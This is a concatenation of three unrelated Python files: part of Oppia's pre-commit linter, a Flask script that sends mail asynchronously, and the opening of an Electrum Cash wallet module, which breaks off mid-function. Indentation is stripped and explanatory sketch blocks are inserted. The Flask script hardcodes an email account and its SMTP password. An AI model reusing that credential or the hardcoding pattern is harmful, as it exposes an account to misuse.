pattern_to_match = (
r'controller.* \[(?P<stringfied_dependencies>[\S\s]*?)' +
r'function\((?P<function_parameters>[\S\s]*?)\)')
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
for filepath in files_to_check:
file_content = FILE_CACHE.read(filepath)
matched_patterns = re.findall(pattern_to_match, file_content)
for matched_pattern in matched_patterns:
stringfied_dependencies, function_parameters = (
matched_pattern)
stringfied_dependencies = (
stringfied_dependencies.strip().replace(
'\'', '').replace(' ', ''))[:-1]
function_parameters = (
function_parameters.strip().replace(' ', ''))
if stringfied_dependencies != function_parameters:
failed = True
python_utils.PRINT(
'Please ensure that in file %s the line breaks '
'pattern between the dependencies mentioned as '
'strings:\n[%s]\nand the dependencies mentioned '
'as function parameters: \n(%s)\nfor the '
'corresponding controller should '
'exactly match.' % (
filepath, stringfied_dependencies,
function_parameters))
python_utils.PRINT('')
if failed:
summary_message = (
'%s Controller dependency line break check failed, '
'see messages above for the affected files.' % (
_MESSAGE_TYPE_FAILED))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = (
'%s Controller dependency line break check passed' % (
_MESSAGE_TYPE_SUCCESS))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
python_utils.PRINT('')
self.process_manager['line_breaks'] = summary_messages
_STDOUT_LIST.append(stdout)
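# --- Illustrative sketch (not part of the original linter) ---
# The controller dependency check extracts two capture groups from each
# 'controller: [...]' block: the dependency names given as strings and
# the parameters of the controller function. It then normalises both and
# compares them. A standalone run of the same regex on a hypothetical
# snippet:
import re

PATTERN = (
    r'controller.* \[(?P<stringfied_dependencies>[\S\s]*?)'
    r'function\((?P<function_parameters>[\S\s]*?)\)')

snippet = "controller: ['$scope', 'MyService', function($scope, MyService) {}]"
for string_deps, func_params in re.findall(PATTERN, snippet):
    string_deps = string_deps.strip().replace("'", '').replace(' ', '')[:-1]
    func_params = func_params.strip().replace(' ', '')
    print(string_deps)                 # $scope,MyService
    print(func_params)                 # $scope,MyService
    print(string_deps == func_params)  # True -> check passes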
def _check_constants_declaration(self):
"""Checks the declaration of constants in the TS files to ensure that
the constants are not declared in files other than *.constants.ajs.ts
and that the constants are declared only a single time. This also checks
that the constants are declared in both *.constants.ajs.ts (for
AngularJS) and in *.constants.ts (for Angular 8).
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting constants declaration check')
python_utils.PRINT('----------------------------------------')
summary_messages = []
failed = False
with _redirect_stdout(_TARGET_STDOUT):
ts_files_to_check = self.ts_filepaths
constants_to_source_filepaths_dict = {}
angularjs_source_filepaths_to_constants_dict = {}
for filepath in ts_files_to_check:
# The following block extracts the corresponding Angularjs
# constants file for the Angular constants file. This is
# required since the check cannot proceed if the AngularJS
# constants file is not provided before the Angular constants
# file.
if filepath.endswith('.constants.ts'):
filename_without_extension = filepath[:-3]
corresponding_angularjs_filepath = (
filename_without_extension + '.ajs.ts')
compiled_js_dir = tempfile.mkdtemp(dir=os.getcwd())
try:
if os.path.isfile(corresponding_angularjs_filepath):
compiled_js_filepath = self._compile_ts_file(
corresponding_angularjs_filepath,
compiled_js_dir)
file_content = FILE_CACHE.read(
compiled_js_filepath).decode('utf-8')
parsed_script = esprima.parseScript(file_content)
parsed_nodes = parsed_script.body
angularjs_constants_list = []
components_to_check = ['constant']
for parsed_node in parsed_nodes:
expression = (
_get_expression_from_node_if_one_exists(
parsed_node, components_to_check))
if not expression:
continue
else:
# The following block populates a set to
# store constants for the Angular-AngularJS
# constants file consistency check.
angularjs_constants_name = (
expression.arguments[0].value)
angularjs_constants_value = (
expression.arguments[1].property.name)
if angularjs_constants_value != (
angularjs_constants_name):
failed = True
python_utils.PRINT(
'%s --> Please ensure that the '
'constant %s is initialized '
'from the value from the '
'corresponding Angular constants'
' file (the *.constants.ts '
'file). Please create one in the'
' Angular constants file if it '
'does not exist there.' % (
filepath,
angularjs_constants_name))
angularjs_constants_list.append(
angularjs_constants_name)
angularjs_constants_set = set(
angularjs_constants_list)
if len(angularjs_constants_set) != len(
angularjs_constants_list):
failed = True
python_utils.PRINT(
'%s --> Duplicate constant declaration '
'found.' % (
corresponding_angularjs_filepath))
angularjs_source_filepaths_to_constants_dict[
corresponding_angularjs_filepath] = (
angularjs_constants_set)
else:
failed = True
python_utils.PRINT(
'%s --> Corresponding AngularJS constants '
'file not found.' % filepath)
finally:
shutil.rmtree(compiled_js_dir)
# Check that the constants are declared only in a
# *.constants.ajs.ts file.
if not filepath.endswith('.constants.ajs.ts'):
for line_num, line in enumerate(FILE_CACHE.readlines(
filepath)):
if 'oppia.constant(' in line:
failed = True
python_utils.PRINT(
'%s --> Constant declaration found at line '
'%s. Please declare the constants in a '
'separate constants file.' % (
filepath, line_num))
# Check if the constant has multiple declarations which is
# prohibited.
parsed_script = self.parsed_js_and_ts_files[filepath]
parsed_nodes = parsed_script.body
components_to_check = ['constant']
angular_constants_list = []
for parsed_node in parsed_nodes:
expression = _get_expression_from_node_if_one_exists(
parsed_node, components_to_check)
if not expression:
continue
else:
constant_name = expression.arguments[0].raw
if constant_name in constants_to_source_filepaths_dict:
failed = True
python_utils.PRINT(
'%s --> The constant %s is already declared '
'in %s. Please import the file where the '
'constant is declared or rename the constant'
'.' % (
filepath, constant_name,
constants_to_source_filepaths_dict[
constant_name]))
else:
constants_to_source_filepaths_dict[
constant_name] = filepath
# Checks that the *.constants.ts and the corresponding
# *.constants.ajs.ts file are in sync.
if filepath.endswith('.constants.ts'):
angular_constants_nodes = (
parsed_nodes[1].declarations[0].init.callee.body.body)
for angular_constant_node in angular_constants_nodes:
if not angular_constant_node.expression:
continue
angular_constant_name = (
angular_constant_node.expression.left.property.name)
angular_constants_list.append(angular_constant_name)
angular_constants_set = set(angular_constants_list)
if len(angular_constants_set) != len(
angular_constants_list):
failed = True
python_utils.PRINT(
'%s --> Duplicate constant declaration found.'
% filepath)
if corresponding_angularjs_filepath in (
angularjs_source_filepaths_to_constants_dict):
angular_minus_angularjs_constants = (
angular_constants_set.difference(
angularjs_source_filepaths_to_constants_dict[
corresponding_angularjs_filepath]))
for constant in angular_minus_angularjs_constants:
failed = True
python_utils.PRINT(
'%s --> The constant %s is not declared '
'in the corresponding angularjs '
'constants file.' % (filepath, constant))
if failed:
summary_message = (
'%s Constants declaration check failed, '
'see messages above for constants with errors.' % (
_MESSAGE_TYPE_FAILED))
else:
summary_message = '%s Constants declaration check passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT(summary_message)
return summary_messages
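# --- Illustrative sketch (not part of the original linter) ---
# At its core, the Angular/AngularJS consistency part of the check above
# reduces to two set comparisons: every constant defined in a
# *.constants.ts file must also appear in its *.constants.ajs.ts
# counterpart, and neither file may define a constant twice. With
# hypothetical constant names:
angular_constants_list = ['PAGE_TITLE', 'MAX_LENGTH', 'MAX_LENGTH']
angularjs_constants_set = {'PAGE_TITLE'}

angular_constants_set = set(angular_constants_list)
has_duplicates = len(angular_constants_set) != len(angular_constants_list)
missing_in_angularjs = angular_constants_set - angularjs_constants_set

print(has_duplicates)                 # True -> duplicate declaration error
print(sorted(missing_in_angularjs))   # ['MAX_LENGTH'] -> missing counterpart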
def _check_dependencies(self):
"""Check the dependencies related issues. This runs
_check_sorted_dependencies and
_match_line_breaks_in_controller_dependencies
in parallel.
"""
methods = [
self._check_sorted_dependencies,
self._match_line_breaks_in_controller_dependencies
]
super(JsTsLintChecksManager, self)._run_multiple_checks(*methods)
def perform_all_lint_checks(self):
"""Perform all the lint checks and returns the messages returned by all
the checks.
Returns:
all_messages: str. All the messages returned by the lint checks.
"""
self.parsed_js_and_ts_files = self._validate_and_parse_js_and_ts_files()
self.parsed_expressions_in_files = (
self._get_expressions_from_parsed_script())
common_messages = super(
JsTsLintChecksManager, self).perform_all_lint_checks()
super(JsTsLintChecksManager, self)._run_multiple_checks(
self._check_extra_js_files,
self._check_js_and_ts_component_name_and_count,
self._check_directive_scope
)
self._check_dependencies()
extra_js_files_messages = self.process_manager['extra']
js_and_ts_component_messages = self.process_manager['component']
directive_scope_messages = self.process_manager['directive']
sorted_dependencies_messages = self.process_manager['sorted']
controller_dependency_messages = self.process_manager['line_breaks']
all_messages = (
common_messages + extra_js_files_messages +
js_and_ts_component_messages + directive_scope_messages +
sorted_dependencies_messages + controller_dependency_messages)
return all_messages
def _check_html_directive_name(self):
"""This function checks that all HTML directives end
with _directive.html.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting HTML directive name check')
python_utils.PRINT('----------------------------------------')
total_files_checked = 0
total_error_count = 0
files_to_check = [
filepath for filepath in self.all_filepaths if not
any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
failed = False
summary_messages = []
# For RegExp explanation, please see https://regex101.com/r/gU7oT6/37.
pattern_to_match = (
r'templateUrl: UrlInterpolationService\.[A-z\(]+' +
r'(?P<directive_name>[^\)]+)')
with _redirect_stdout(_TARGET_STDOUT):
for filepath in files_to_check:
file_content = FILE_CACHE.read(filepath)
total_files_checked += 1
matched_patterns = re.findall(pattern_to_match, file_content)
for matched_pattern in matched_patterns:
matched_pattern = matched_pattern.split()
directive_filepath = ''.join(matched_pattern).replace(
'\'', '').replace('+', '')
if not directive_filepath.endswith('_directive.html'):
failed = True
total_error_count += 1
python_utils.PRINT(
'%s --> Please ensure that this file ends '
'with _directive.html.' % directive_filepath)
python_utils.PRINT('')
if failed:
summary_message = (
'%s HTML directive name check failed, see files above '
'that did not end with _directive.html but '
'should have.' % _MESSAGE_TYPE_FAILED)
summary_messages.append(summary_message)
else:
summary_message = '%s HTML directive name check passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT('')
if total_files_checked == 0:
if self.verbose_mode_enabled:
python_utils.PRINT('There are no files to be checked.')
else:
python_utils.PRINT('(%s files checked, %s errors found)' % (
total_files_checked, total_error_count))
python_utils.PRINT(summary_message)
return summary_messages
class OtherLintChecksManager(LintChecksManager):
"""Manages all the linting functions except the ones against Js and Ts. It
checks Python, CSS, and HTML files.
Attributes:
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
def __init__(
self, verbose_mode_enabled=False):
"""Constructs a OtherLintChecksManager object.
Args:
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
super(OtherLintChecksManager, self).__init__(
verbose_mode_enabled=verbose_mode_enabled)
@property
def py_filepaths(self):
"""Return all python filepaths."""
return _FILES['.py']
@property
def html_filepaths(self):
"""Return all html filepaths."""
return _FILES['.html']
@property
def other_filepaths(self):
"""Return other filepaths."""
return _FILES['other']
@property
def css_filepaths(self):
"""Return css filepaths."""
return _FILES['.css']
@property
def all_filepaths(self):
"""Return all filepaths."""
return (
self.css_filepaths + self.html_filepaths +
self.other_filepaths + self.py_filepaths)
def _check_import_order(self):
"""This function is used to check that each file
has imports placed in alphabetical order.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting import-order checks')
python_utils.PRINT('----------------------------------------')
summary_messages = []
files_to_check = [
filepath for filepath in self.py_filepaths if not
any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
failed = False
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
for filepath in files_to_check:
# This line prints the error message along with the file path
# and returns True if it finds an error, else returns False.
# If check is set to True, isort simply checks the file and
# if check is set to False, it autocorrects import-order errors.
if (isort.SortImports(
filepath, check=True, show_diff=(
True)).incorrectly_sorted):
failed = True
python_utils.PRINT('')
python_utils.PRINT('')
if failed:
summary_message = (
'%s Import order checks failed, file imports should be '
'alphabetized, see affected files above.' % (
_MESSAGE_TYPE_FAILED))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = (
'%s Import order checks passed' % _MESSAGE_TYPE_SUCCESS)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
self.process_manager['import'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_import(self):
"""Run checks relates to import order."""
methods = [self._check_import_order]
super(OtherLintChecksManager, self)._run_multiple_checks(*methods)
def _check_docstring(self):
"""Run checks related to docstring."""
methods = [self._check_docstrings]
super(OtherLintChecksManager, self)._run_multiple_checks(*methods)
def _check_docstrings(self):
"""This function ensures that docstrings end in a period and the arg
order in the function definition matches the order in the doc string.
Returns:
summary_messages: list(str). Summary of messages generated by the
check.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting docstring checks')
python_utils.PRINT('----------------------------------------')
summary_messages = []
files_to_check = [
filepath for filepath in self.py_filepaths if not
any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
missing_period_message = (
'There should be a period at the end of the docstring.')
multiline_docstring_message = (
'Multiline docstring should end with a new line.')
single_line_docstring_message = (
'Single line docstring should not span two lines. '
'If line length exceeds 80 characters, '
'convert the single line docstring to a multiline docstring.')
previous_line_message = (
'There should not be any empty lines before the end of '
'the multi-line docstring.')
space_after_triple_quotes_in_docstring_message = (
'There should be no space after """ in docstring.')
failed = False
is_docstring = False
is_class_or_function = False
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
for filepath in files_to_check:
file_content = FILE_CACHE.readlines(filepath)
file_length = len(file_content)
for line_num in python_utils.RANGE(file_length):
line = file_content[line_num].strip()
prev_line = ''
if line_num > 0:
prev_line = file_content[line_num - 1].strip()
# Check if it is a docstring and not some multi-line string.
if (prev_line.startswith('class ') or
prev_line.startswith('def ')) or (
is_class_or_function):
is_class_or_function = True
if prev_line.endswith('):') and (
line.startswith('"""')):
is_docstring = True
is_class_or_function = False
# Check for space after """ in docstring.
if re.match(r'^""".+$', line) and is_docstring and (
line[3] == ' '):
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num + 1,
space_after_triple_quotes_in_docstring_message))
python_utils.PRINT('')
is_docstring = False
# Check if single line docstring span two lines.
if line == '"""' and prev_line.startswith('"""') and (
is_docstring):
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num, single_line_docstring_message))
python_utils.PRINT('')
is_docstring = False
# Check for single line docstring.
elif re.match(r'^""".+"""$', line) and is_docstring:
# Check for punctuation at line[-4] since last three
# characters are double quotes.
if (len(line) > 6) and (
line[-4] not in
ALLOWED_TERMINATING_PUNCTUATIONS):
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num + 1, missing_period_message))
python_utils.PRINT('')
is_docstring = False
# Check for multiline docstring.
elif line.endswith('"""') and is_docstring:
# Case 1: line is """. This is correct for multiline
# docstring.
if line == '"""':
# Check for empty line before the end of docstring.
if prev_line == '':
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num, previous_line_message))
python_utils.PRINT('')
# Check for punctuation at end of docstring.
else:
last_char_is_invalid = prev_line[-1] not in (
ALLOWED_TERMINATING_PUNCTUATIONS)
no_word_is_present_in_excluded_phrases = (
not any(
word in prev_line for word in(
EXCLUDED_PHRASES)))
if last_char_is_invalid and (
no_word_is_present_in_excluded_phrases):
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num,
missing_period_message))
python_utils.PRINT('')
# Case 2: line contains some words before """. """
# should shift to next line.
elif not any(word in line for word in EXCLUDED_PHRASES):
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num + 1,
multiline_docstring_message))
python_utils.PRINT('')
is_docstring = False
docstring_checker = docstrings_checker.ASTDocStringChecker()
for filepath in files_to_check:
ast_file = ast.walk(
ast.parse(
python_utils.convert_to_bytes(
FILE_CACHE.read(filepath))))
func_defs = [n for n in ast_file if isinstance(
n, ast.FunctionDef)]
for func in func_defs:
# Check that the args in the docstring are listed in the
# same order as they appear in the function definition.
func_result = docstring_checker.check_docstrings_arg_order(
func)
for error_line in func_result:
python_utils.PRINT('%s --> Func %s: %s' % (
filepath, func.name, error_line))
python_utils.PRINT('')
failed = True
python_utils.PRINT('')
if failed:
summary_message = (
'%s Docstring check failed, see files above with bad '
'docstrings to be fixed.' % _MESSAGE_TYPE_FAILED)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = (
'%s Docstring check passed' % _MESSAGE_TYPE_SUCCESS)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
self.process_manager['docstrings'] = summary_messages
_STDOUT_LIST.append(stdout)
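# --- Illustrative sketch (not part of the original linter) ---
# For a single-line docstring such as '"""Does a thing."""', the check
# above looks at line[-4] (the character just before the closing triple
# quote) and requires it to be an allowed terminating punctuation mark.
# ALLOWED_TERMINATING_PUNCTUATIONS is defined elsewhere in this script;
# the tuple below is a hypothetical stand-in for illustration only.
ALLOWED_TERMINATING_PUNCTUATIONS_EXAMPLE = ('.', '?', '!')

def single_line_docstring_is_ok(line):
    """Return True if a one-line docstring ends with valid punctuation."""
    return len(line) <= 6 or (
        line[-4] in ALLOWED_TERMINATING_PUNCTUATIONS_EXAMPLE)

print(single_line_docstring_is_ok('"""Does a thing."""'))  # True
print(single_line_docstring_is_ok('"""Does a thing"""'))   # False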
def _check_html_tags_and_attributes(self, debug=False):
"""This function checks the indentation of lines in HTML files."""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting HTML tag and attribute check')
python_utils.PRINT('----------------------------------------')
html_files_to_lint = self.html_filepaths
failed = False
summary_messages = []
with _redirect_stdout(_TARGET_STDOUT):
for filepath in html_files_to_lint:
file_content = FILE_CACHE.read(filepath)
file_lines = FILE_CACHE.readlines(filepath)
parser = CustomHTMLParser(filepath, file_lines, debug)
parser.feed(file_content)
if len(parser.tag_stack) != 0:
raise TagMismatchException('Error in file %s\n' % filepath)
if parser.failed:
failed = True
if failed:
summary_message = (
'%s HTML tag and attribute check failed, fix the HTML '
'files listed above.' % _MESSAGE_TYPE_FAILED)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = '%s HTML tag and attribute check passed' % (
_MESSAGE_TYPE_SUCCESS)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
python_utils.PRINT('')
return summary_messages
def _lint_html_files(self):
"""This function is used to check HTML files for linting errors."""
parent_dir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
node_path = os.path.join(
parent_dir, 'oppia_tools', 'node-10.15.3', 'bin', 'node')
htmllint_path = os.path.join(
'node_modules', 'htmllint-cli', 'bin', 'cli.js')
error_summary = []
total_error_count = 0
summary_messages = []
htmllint_cmd_args = [node_path, htmllint_path, '--rc=.htmllintrc']
html_files_to_lint = self.html_filepaths
if self.verbose_mode_enabled:
python_utils.PRINT('Starting HTML linter...')
python_utils.PRINT('----------------------------------------')
python_utils.PRINT('')
if not self.verbose_mode_enabled:
python_utils.PRINT('Linting HTML files.')
for filepath in html_files_to_lint:
proc_args = htmllint_cmd_args + [filepath]
if self.verbose_mode_enabled:
python_utils.PRINT('Linting %s file' % filepath)
with _redirect_stdout(_TARGET_STDOUT):
proc = subprocess.Popen(
proc_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
encoded_linter_stdout, _ = proc.communicate()
linter_stdout = encoded_linter_stdout.decode(encoding='utf-8')
# This line splits the output of the linter and extracts digits
# from it. The digits are stored in a list. The second last
# digit in the list represents the number of errors in the file.
error_count = (
[int(s) for s in linter_stdout.split() if s.isdigit()][-2])
if error_count:
error_summary.append(error_count)
python_utils.PRINT(linter_stdout)
with _redirect_stdout(_TARGET_STDOUT):
if self.verbose_mode_enabled:
python_utils.PRINT('----------------------------------------')
for error_count in error_summary:
total_error_count += error_count
total_files_checked = len(html_files_to_lint)
if total_error_count:
python_utils.PRINT('(%s files checked, %s errors found)' % (
total_files_checked, total_error_count))
summary_message = (
'%s HTML linting failed, '
'fix the HTML files listed above.' % _MESSAGE_TYPE_FAILED)
summary_messages.append(summary_message)
else:
summary_message = '%s HTML linting passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT('')
python_utils.PRINT(summary_message)
python_utils.PRINT('HTML linting finished.')
python_utils.PRINT('')
return summary_messages
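# --- Illustrative sketch (not part of the original linter) ---
# The HTML linter invocation above recovers the per-file error count by
# collecting every standalone integer in htmllint's stdout and taking
# the second-to-last one. The output line below is purely hypothetical;
# only the extraction logic is being demonstrated.
hypothetical_stdout = 'core/templates/about.html: 3 errors found out of 1 file'
digits = [int(s) for s in hypothetical_stdout.split() if s.isdigit()]
error_count = digits[-2]
print(digits)       # [3, 1]
print(error_count)  # 3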
def perform_all_lint_checks(self):
"""Perform all the lint checks and returns the messages returned by all
the checks.
Returns:
all_messages: str. All the messages returned by the lint checks.
"""
common_messages = super(
OtherLintChecksManager, self).perform_all_lint_checks()
# division_operator_messages = self._check_division_operator()
# import_order_messages = self._check_import_order()
self._check_import()
self._check_docstring()
docstring_messages = self.process_manager['docstrings']
# The html tags and attributes check has an additional
# debug mode which, when enabled, prints the tag_stack for each file.
html_tag_and_attribute_messages = (
self._check_html_tags_and_attributes())
html_linter_messages = self._lint_html_files()
import_order_messages = self.process_manager['import']
all_messages = (
import_order_messages + common_messages +
docstring_messages + html_tag_and_attribute_messages +
html_linter_messages)
return all_messages
def _print_complete_summary_of_errors():
"""Print complete summary of errors."""
error_messages = _TARGET_STDOUT.getvalue()
piped_messages = ''.join([x.getvalue() for x in _STDOUT_LIST])
error_messages += piped_messages
if error_messages != '':
python_utils.PRINT('Summary of Errors:')
python_utils.PRINT('----------------------------------------')
python_utils.PRINT(error_messages)
def read_files(file_paths):
"""Read all files to be checked and cache them. This will spin off multiple
threads to increase the efficiency.
"""
threads = []
for file_path in file_paths:
thread = threading.Thread(target=FILE_CACHE.read, args=(file_path,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def categorize_files(file_paths):
"""Categorize all the files and store them in shared variable _FILES."""
all_filepaths_dict = {
'.py': [], '.html': [], '.ts': [], '.js': [], 'other': [], '.css': []
}
for file_path in file_paths:
_, extension = os.path.splitext(file_path)
if extension in all_filepaths_dict:
all_filepaths_dict[extension].append(file_path)
else:
all_filepaths_dict['other'].append(file_path)
_FILES.update(all_filepaths_dict)
def _join_linting_process(linting_processes, result_queues, result_stdouts):
"""Join process spawn off by _lint_all_files and capture the outputs."""
for process in linting_processes:
process.join()
summary_messages = []
for result_queue in result_queues:
while not result_queue.empty():
summary_messages.append(result_queue.get())
for result_stdout in result_stdouts:
while not result_stdout.empty():
summary_messages.append(result_stdout.get())
with _redirect_stdout(_TARGET_STDOUT):
python_utils.PRINT(b'\n'.join(summary_messages))
python_utils.PRINT('')
python_utils.PRINT('')
return summary_messages
def main(args=None):
"""Main method for pre commit linter script that lints Python, JavaScript,
HTML, and CSS files.
"""
parsed_args = _PARSER.parse_args(args=args)
# Default mode is non-verbose mode, if arguments contains --verbose flag it
# will be made True, which will represent verbose mode.
verbose_mode_enabled = bool(parsed_args.verbose)
all_filepaths = _get_all_filepaths(parsed_args.path, parsed_args.files)
if len(all_filepaths) == 0:
python_utils.PRINT('---------------------------')
python_utils.PRINT('No files to check.')
python_utils.PRINT('---------------------------')
return
read_files(all_filepaths)
categorize_files(all_filepaths)
linting_processes, result_queues, result_stdout = _lint_all_files(
_FILES['.js'], _FILES['.ts'], _FILES['.py'], _FILES['.html'],
_FILES['.css'], verbose_mode_enabled)
code_owner_message = _check_codeowner_file(verbose_mode_enabled)
# Pylint requires the parameters "this_bases" and "d" to be provided,
# presumably due to the metaclass.
js_ts_lint_checks_manager = JsTsLintChecksManager( # pylint: disable=no-value-for-parameter
verbose_mode_enabled)
other_lint_checks_manager = OtherLintChecksManager( # pylint: disable=no-value-for-parameter
verbose_mode_enabled)
all_messages = code_owner_message
js_message = js_ts_lint_checks_manager.perform_all_lint_checks()
other_messages = other_lint_checks_manager.perform_all_lint_checks()
all_messages += js_message + other_messages
all_messages += _join_linting_process(
linting_processes, result_queues, result_stdout)
_print_complete_summary_of_errors()
if any([message.startswith(_MESSAGE_TYPE_FAILED) for message in
all_messages]):
python_utils.PRINT('---------------------------')
python_utils.PRINT('Checks Not Passed.')
python_utils.PRINT('---------------------------')
sys.exit(1)
else:
python_utils.PRINT('---------------------------')
python_utils.PRINT('All Checks Passed.')
python_utils.PRINT('---------------------------')
NAME_SPACE = multiprocessing.Manager().Namespace()
PROCESSES = multiprocessing.Manager().dict()
NAME_SPACE.files = FileCache()
FILE_CACHE = NAME_SPACE.files
if __name__ == '__main__':
main()
|
flask_send_mail.py
|
# -*- coding:utf-8 -*-
from flask import Flask, render_template
from flask_mail import Mail, Message
from threading import Thread  # thread support for asynchronous sending
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
app = Flask(__name__)
# Mail configuration: server / port / SSL / account name / authorization code
app.config['MAIL_SERVER'] = "smtp.163.com"
app.config['MAIL_PORT'] = 465
app.config['MAIL_USE_SSL'] = True
app.config['MAIL_USERNAME'] = 'zhangqianjuns@163.com'
app.config['MAIL_PASSWORD'] = "qwer1234"
app.config['MAIL_DEFAULT_SENDER'] = 'FlaskAdmin<zhangqianjuns@163.com>'
# Bind to the application and initialize the mail object
mail = Mail(app)
@app.route('/')
def index():
return render_template('flask_send_email.html')
@app.route('/mail')
def send_mail():
msg = Message(subject='Mail subject', recipients=['zhangqianjuns@163.com'])
msg.body = 'Body of the msg'
msg.html = '<h1>Hahaha</h1>'
t = Thread(target=asyn_send_email, args=(msg, ))
t.start()
return 'Message sent successfully'
def asyn_send_email(msg):
try:
with app.app_context():
mail.send(msg)
except Exception as e:
print(e)
return 'Message failed to send'
if __name__ == '__main__':
app.run(debug=True)
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import os
import queue
import random
import time
import threading
from collections import defaultdict
from functools import partial
import itertools
from .i18n import ngettext
from .util import NotEnoughFunds, ExcessiveFee, PrintError, UserCancelled, profiler, format_satoshis, format_time, finalization_print_error, to_string
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
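# --- Illustrative sketch (not part of the original wallet code) ---
# relayfee() takes the fee the connected server advertises (falling back
# to RELAY_FEE when there is none) and caps it at MAX_RELAY_FEE;
# dust_threshold() is simply the hard-coded 546 satoshis. A quick check
# with a stub network object (hypothetical values, for illustration only):
class _StubNetwork:
    relay_fee = 80000  # sat/kB advertised by a (hypothetical) server

print(relayfee(_StubNetwork()))  # 50000 -- capped at MAX_RELAY_FEE
print(relayfee(None))            # 5000  -- falls back to RELAY_FEE
print(dust_threshold(None))      # 546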
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
